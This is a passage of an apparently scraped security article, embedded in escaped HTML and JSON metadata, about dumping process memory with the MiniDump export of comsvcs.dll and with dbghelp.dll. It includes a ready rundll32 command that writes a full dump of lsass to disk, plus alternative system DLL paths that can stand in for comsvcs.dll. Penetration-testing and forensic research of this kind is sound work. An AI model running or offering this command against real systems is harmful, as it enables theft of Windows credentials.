C:\\Windows\\winsxs\\x86_microsoft-windows-imageanalysis_31bf3856ad364e35_6.1.7601.17514_none_4a6381a588654ba6\\dbghelp.dll--&gt;MiniDumpReadDumpStream\u003Cbr>[+] C:\\Windows\\winsxs\\x86_microsoft-windows-imageanalysis_31bf3856ad364e35_6.1.7601.17514_none_4a6381a588654ba6\\dbghelp.dll--&gt;MiniDumpWriteDump\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test results are as follows:\u003C\u002Fp>\u003Ch4>1. For processes with different architectures, the available DLLs differ.\u003C\u002Fh4>\u003Cp>For 32-bit processes, both 32-bit and 64-bit DLLs can be used:\u003C\u002Fp>\u003Cul>\u003Cli>C:\\windows\\system32\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\Syswow64\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\winsxs\\amd64_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_ceb756d4b98f01a4\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\winsxs\\x86_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_7298bb510131906e\\comsvcs.dll\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For 64-bit processes, 64-bit DLLs can be used:\u003C\u002Fp>\u003Cul>\u003Cli>C:\\windows\\system32\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\winsxs\\amd64_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_ceb756d4b98f01a4\\comsvcs.dll\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Cannot use 32-bit DLL:\u003C\u002Fp>\u003Cul>\u003Cli>C:\\Windows\\Syswow64\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\winsxs\\x86_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_7298bb510131906e\\comsvcs.dll\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>2. dbghelp.dll corresponds to API MiniDumpWriteDump\u003C\u002Fh4>\u003Ch4>3. The exported function minidumpmode in SOS.dll\u003C\u002Fh4>\u003Cp>Used to prevent execution of unsafe commands when using minidump. 0 means disable this feature, 1 means enable. Default is 0\u003C\u002Fp>\u003Ch2>0x05 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>If you want to dump the memory file of a specified process, you can use the new method. Example command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell -c \"rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 808 C:\\test\\lsass.dmp full\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Where comsvcs.dll can be replaced with the following DLLs:\u003C\u002Fp>\u003Cul>\u003Cli>C:\\Windows\\Syswow64\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\winsxs\\amd64_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_ceb756d4b98f01a4\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\winsxs\\x86_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_7298bb510131906e\\comsvcs.dll\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The advantage of this method is that it does not require uploading files and can be implemented using the dlls included by default in the system.\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Based on odzhan's article, this paper supplements the points to note during testing, extends the methods, and analyzes exploitation ideas. A PowerShell script is written to automate scanning of all dll export functions in the system directory.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",724,"Onedaysec",4,"published","2026-02-02T07:38:21.197Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"MiniDumpWriteDump via COM+ Services DLL Exploitation Testing Guide","MiniDumpWriteDump, comsvcs.dll, process memory dump, lsass.exe, exploitation testing, PowerShell script, DLL export functions, SeDebugPrivilege, penetration testing, memory forensics",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46,47],866,865,863,862,{"title":39,"description":39,"image":39},"2026-07-24T15:37:11.140Z","2026-07-23T16:02:12.718Z","draft","2026-07-23T16:15:12.599Z"]